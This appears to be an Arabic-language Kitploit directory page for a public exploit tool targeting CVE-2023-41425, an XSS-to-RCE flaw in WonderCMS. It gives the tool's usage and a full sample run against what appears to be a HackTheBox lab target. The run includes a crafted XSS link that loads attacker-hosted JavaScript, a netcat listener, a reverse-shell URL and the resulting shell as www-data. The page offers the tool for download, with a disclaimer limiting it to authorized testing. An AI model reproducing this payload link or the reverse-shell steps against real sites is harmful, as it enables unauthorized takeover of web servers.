Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-41425 — CVE-2023-41425 (استغلال ثغرة XSS إلى RCE في Wonder CMS) الذي يقدم النصوص البرمجية المطلوبة محليًا. مفيد إذا كنت تائهًا في البحر ووجدت مشكلة في دراجتك الهوائية. | Kitploit
أدوات/GitHubGitHub/duck-sec/cve-2023-41425
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubduck-sec/cve-2023-41425

CVE-2023-41425

CVE-2023-41425 (استغلال ثغرة XSS إلى RCE في Wonder CMS) الذي يقدم النصوص البرمجية المطلوبة محليًا. مفيد إذا كنت تائهًا في البحر ووجدت مشكلة في دراجتك الهوائية.

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-41425

الوصف

ثغرة برمجة نصية عبر المواقع (XSS) في Wonder CMS من الإصدار 3.2.0 إلى الإصدار 3.4.2 تسمح لمهاجم عن بعد بتنفيذ كود عشوائي عبر سكريبت مصمّم تم رفعه إلى مكوّن installModule. هذه نسخة معدّلة من الاستغلال الأصلي بواسطة prodigiousMind والتي توسّع الاستغلال ليخدم الاستغلال بالكامل محليًا، دون الاعتماد على اتصال إنترنت خارجي.

إنه مفيد إذا كنت تائهًا في عرض البحر، ووجدت مشكلة في دراجتك...

ملاحظة: تم ترك xss.js في المستودع لأغراض العرض التوضيحي، وسيقوم السكريبت باستبداله بإعداداتك عند التشغيل.

طريقة الاستخدام

root@kitploit:~
usage: exploit.py [-h] -u URL -lh LHOST -lp LPORT -sh SRVHOST -sp SRVPORT

WonderCMS 4.3.2 XSS to RCE Exploit

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     The login URL of the WonderCMS site (e.g., http://localhost/wondercms/loginURL)
  -lh LHOST, --lhost LHOST
                        The IP address for the reverse shell listener
  -lp LPORT, --lport LPORT
                        The port for the reverse shell listener
  -sh SRVHOST, --srvhost SRVHOST
                        The local IP serving the malicious XSS JavaScript
  -sp SRVPORT, --srvport SRVPORT
                        The local port serving the malicious XSS JavaScript

مثال

ملاحظة: قد يكون هذا الاستغلال بطيئًا جدًا في العمل!

root@kitploit:~
$python3 exploit.py -u http://sea.htb/loginURL  -lh 10.10.14.101 -lp  7777  -sh 10.10.14.101 -sp 8888
##################################
# Wondercms 4.3.2 XSS to RCE     #
# Original POC by prodigiousMind #
# Updated version by Ducksec     #
##################################


Check you got this stuff right!


Parsed arguments:
URL: http://sea.htb/loginURL
LHOST: 10.10.14.101
LPORT: 7777
SRVHOST: 10.10.14.101
SRVPORT: 8888


[+] xss.js is created
[+] Execute the below command in another terminal:

----------------------------
nc -lvp 7777
----------------------------

Send the below link to admin:

----------------------------
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.101:8888/xss.js"></script><form+action="
----------------------------



[+] Ensure that main.zip is still in this directory.
[+] Once the target successfully requests main.zip it's safe to kill this script.


[+] Once complete, you can also re-exploit by requesting: http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.101&lport=7777

Starting HTTP server to allow access to xss.js
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.129.178.129 - - [02/Oct/2024 14:39:51] "GET /xss.js HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
root@kitploit:~
$nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.10.14.101] from (UNKNOWN) [10.129.178.129] 39958
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 13:40:01 up 4 min,  0 users,  load average: 0.93, 0.49, 0.20
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

المراجع

  1. https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413
  2. https://github.com/WonderCMS/wondercms/releases/tag/3.4.3

إخلاء مسؤولية

هذا الكود مقدّم لأغراض التعليم واختبار الأمان الأخلاقي فقط. يجب استخدامه بمسؤولية وفقط في بيئات تم الحصول فيها على إذن صريح. الاستخدام غير المصرح به أو الضار محظور تمامًا. باستخدام هذا الكود، فإنك توافق على الالتزام بجميع القوانين واللوائح والمعايير الأخلاقية المعمول بها في نطاق سلطتك القضائية. يتبرأ المبتكرون والمساهمون من أي مسؤولية عن أي أضرار أو عواقب ناتجة عن سوء الاستخدام أو الاستخدام غير المصرح به لهذا الكود.

تنزيل الأداة